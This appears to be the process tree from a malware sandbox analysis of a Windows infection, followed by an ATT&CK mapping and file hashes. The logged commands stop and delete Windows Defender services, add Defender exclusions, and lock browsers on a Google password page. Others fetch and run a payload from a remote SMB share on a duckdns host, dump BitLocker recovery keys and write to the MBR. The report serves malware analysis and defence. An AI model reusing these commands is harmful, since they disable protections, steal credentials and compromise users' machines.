-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:6048
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:5492
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:4088
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:5544
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:1692
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:2156
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:1192
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:6080
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:4944
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:5104
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:3020
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:5536
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:3592
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:2544
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:4980
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:5936
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:3116
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:4148
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:5620
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:4632
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:2356
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:1516
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:4468
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:1856
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:5928
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:5844
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:4208
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:856
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:4836
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:5896
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:6128
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:5892
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:5164
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:5344
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10450110101\1d96eeb059.exe"C:\Users\Admin\AppData\Local\Temp\10450110101\1d96eeb059.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10450110101\1d96eeb059.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3640
-
-
-
C:\Users\Admin\AppData\Local\Temp\10450120101\268a518848.exe"C:\Users\Admin\AppData\Local\Temp\10450120101\268a518848.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10450120101\268a518848.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5316
-
-
-
C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe"C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe"3⤵
- Executes dropped EXE
PID:1788
-
-
C:\Users\Admin\AppData\Local\Temp\10450150101\abb6489dab.exe"C:\Users\Admin\AppData\Local\Temp\10450150101\abb6489dab.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1256
-
-
C:\Users\Admin\AppData\Local\Temp\10450160101\a6c25b1806.exe"C:\Users\Admin\AppData\Local\Temp\10450160101\a6c25b1806.exe"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\10450170101\7d66731089.exe"C:\Users\Admin\AppData\Local\Temp\10450170101\7d66731089.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3372 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:3408
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1692 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {cf70559b-f4f7-4b66-98e1-6c6694b67d12} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:1776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {4746739b-ff55-4651-ac00-7b02573135a6} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:5512
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {d2647da1-59a5-4375-bf0f-62034ff2bf48} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:1928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4004 -prefsLen 27276 -prefMapHandle 4008 -prefMapSize 270279 -ipcHandle 4076 -initialChannelId {8ab737e2-60e6-45ab-aa63-d6a87134fd74} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:4724
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2824 -prefsLen 34775 -prefMapHandle 2720 -prefMapSize 270279 -jsInitHandle 2816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3328 -initialChannelId {a1f9ac70-f405-42df-82ae-ccb7f8097b48} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
PID:5932
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5000 -prefsLen 35012 -prefMapHandle 4964 -prefMapSize 270279 -ipcHandle 5020 -initialChannelId {c777a5a8-31a3-44d2-9c96-163b334691be} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
PID:2836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5408 -initialChannelId {7b3b1cd8-84e5-436d-8ab4-5e01232942ec} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
PID:4328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5600 -prefsLen 32952 -prefMapHandle 5604 -prefMapSize 270279 -jsInitHandle 5608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5616 -initialChannelId {1a1e4151-0eee-41bc-ba02-0286988b73b5} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:4332
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5788 -prefsLen 32952 -prefMapHandle 5792 -prefMapSize 270279 -jsInitHandle 5796 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5804 -initialChannelId {5ff772c2-28e9-4090-a67a-781928d87fec} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:3772
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10450180101\66a7aa70aa.exe"C:\Users\Admin\AppData\Local\Temp\10450180101\66a7aa70aa.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe"C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe"3⤵
- Executes dropped EXE
PID:1740
-
-
C:\Users\Admin\AppData\Local\Temp\10450200101\ab0e067345.exe"C:\Users\Admin\AppData\Local\Temp\10450200101\ab0e067345.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1976
-
-
C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6960 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
PID:6604 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6952
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:6956
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6840
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:7044
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
- System Location Discovery: System Language Discovery
PID:7084
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
- System Location Discovery: System Language Discovery
PID:7128
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
PID:5388
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
- System Location Discovery: System Language Discovery
PID:5368
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3632
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:5064
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10450221121\pfJNmVW.cmd"3⤵
- System Location Discovery: System Language Discovery
PID:6348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall5⤵
- System Location Discovery: System Language Discovery
PID:1044 -
C:\Windows\SysWOW64\net.exenet use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!6⤵
- System Location Discovery: System Language Discovery
PID:5116
-
-
\??\UNC\aaso12.duckdns.org\shear\s.exe\\aaso12.duckdns.org\shear\s -fullinstall6⤵
- Sets service image path in registry
- Drops file in Program Files directory
PID:2140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10450230101\e1d4d40336.exe"C:\Users\Admin\AppData\Local\Temp\10450230101\e1d4d40336.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:7016 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:2100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6912
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:6812
-
-
-
C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6196 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:832
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6960
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBtAHAAUABSAGUARgBlAFIARQBuAEMARQAgAC0AZQB4AEMAbAB1AFMAaQBPAG4AcABBAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEYAcgBhAG0AZQB3AG8AcgBrAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAGYATwByAEMARQA7ACAAQQBkAGQALQBNAHAAcAByAEUARgBFAFIAZQBOAGMAZQAgAC0ARQB4AEMAbAB1AFMAaQBvAG4AUABSAE8AQwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAdQByAHIAZQBuAHQAXABGAHIAYQBtAGUAdwBvAHIAawBOAGEAbQBlAC4AZQB4AGUAIAAtAGYAbwBSAEMARQA=1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
C:\Program Files\Mesh Agent\MeshAgent.exe"C:\Program Files\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5276
-
-
C:\Windows\system32\cmd.exe/c manage-bde -protectors -get C: -Type recoverypassword2⤵PID:2600
-
C:\Windows\system32\manage-bde.exemanage-bde -protectors -get C: -Type recoverypassword3⤵PID:4784
-
-
-
C:\Windows\system32\cmd.exe/c manage-bde -protectors -get F: -Type recoverypassword2⤵PID:3020
-
C:\Windows\system32\manage-bde.exemanage-bde -protectors -get F: -Type recoverypassword3⤵PID:5904
-
-
-
C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exeC:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4332 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5204
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5320
-
C:\Program Files\Mesh Agent\MeshAgent.exe"C:\Program Files\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:7092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\system32\cmd.exe/c manage-bde -protectors -get C: -Type recoverypassword2⤵PID:5952
-
C:\Windows\system32\manage-bde.exemanage-bde -protectors -get C: -Type recoverypassword3⤵PID:6492
-
-
-
C:\Windows\system32\cmd.exe/c manage-bde -protectors -get F: -Type recoverypassword2⤵PID:6544
-
C:\Windows\system32\manage-bde.exemanage-bde -protectors -get F: -Type recoverypassword3⤵PID:6564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:7100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:7144
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
7Windows Service
7Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
7Windows Service
7Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Registry
8Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
154KB
MD58ff50d0e7d0e4d46e8505ebc7aff902d
SHA1f1c0b56cdc677f3164317990604e7bc209a9ccfc
SHA256944194e6103d07c093879fb39b07487431ee947aa6b3b1ca75391c7d335fb921
SHA512837a60cb48e43e0f3cb50394b00f691b6bf96805deac65a2154e980be3dee115134edfdb432fe44172c684e7adfc9c51b25038a768a650216ed31973de52b9ef
-
Filesize
154KB
MD5838cb3f856cc1ab94dc4d28e2ddb184a
SHA1139853756ebbf08e0f4607718071088ef8b00bf6
SHA256961edc06ae83733248c80b383f59535658d4f02fe3d0ea7a9272a142484bf605
SHA512913cce6a930b386c273a49a6611d972c0a63c916db6bfaa11bf96d3d85dbd74447506afb6557efbe22966c478ecbe557503be21d23d814e07ecf1d17105fff95
-
Filesize
3.3MB
MD591424f307b7f0e238aab1f06434a7dc4
SHA14fb5ec3082d3545a79e2ccbd4b624320cafd68f1
SHA256cdc2aa09167bd32f9a01eb60414d0b8faaf8616b9a23a7fc1671bb6bc7f162a1
SHA5126830052ce91c378e7e21c385fb9a522f57fa59d1082a460a26199dbcfa808b37abad741eb8bf7dfd746d522d37dc03ac9d1674fb429f988873eb6a53fde93f83
-
Filesize
838B
MD50a743d6c57450a2d49a29271195f3356
SHA12f412841f6c0e365b5f08a22772254b07934d17d
SHA25609c2a373e9885355f76bf3a42e13d83510d1dfdaa02f507de28d25fdd46c681d
